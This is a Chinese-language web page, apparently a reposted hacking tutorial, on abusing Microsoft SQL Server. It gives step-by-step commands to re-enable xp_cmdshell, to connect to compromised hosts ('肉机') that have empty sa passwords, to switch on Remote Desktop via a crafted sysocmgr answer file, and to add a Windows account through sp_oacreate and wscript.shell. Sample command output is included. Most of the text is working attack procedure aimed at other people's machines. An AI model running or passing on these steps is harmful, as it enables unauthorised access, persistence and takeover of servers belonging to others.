广告：
网页制作参考
千千学园
雨路开发频道
雨路技术文档
技术问答
编程技术

用sql连接器恢复xp_cmdshlle的命令

（1）sql query analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

（2）首先在sqlexec sunx version的format选项里填上%s，在cmd选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

（3）mssql2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
这个很简单,自己堵后门用:)

二,在可以运行xp_cmdshell的机器上直接开3389不需要上传的
实例过程：
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令，看系统，server版的才能 开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\winnt
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\winnt="microsoft windows 2000 server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\winnt="microsoft windows 2000 server" /fastdetect

命令:xp_cmdshell "echo [components] > c:\duguxike" //在c盘根目录建写入一个文件，文件名duguxike大家可以自己改为自己的
执行成功,结果:


命令:xp_cmdshell "echo tsenable = on >> c:\duguxike" //追加写入
执行成功,结果:


命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[components]
tsenable = on
tsenable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389，成功的话过会肉机会重启！！
执行成功,结果:
getlocalmanagedapplications returned (2)

之后就看大家的了，不过要记得册除新建的duguxike文件哦！！

三不需要xp_cmdshll直接添加系统帐号,对xplog70.dll被删很有效
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
_content>如果xpcmdshll被删了第一条恢复
第二条可以执行xpcmdshell但是无法利用差异备分来上传的情况下使用(本人win2000下测试成功)
第三条xplog70.dll被删除的情况下直接添加帐号前提对方了开了3389 139 23
才好用

（）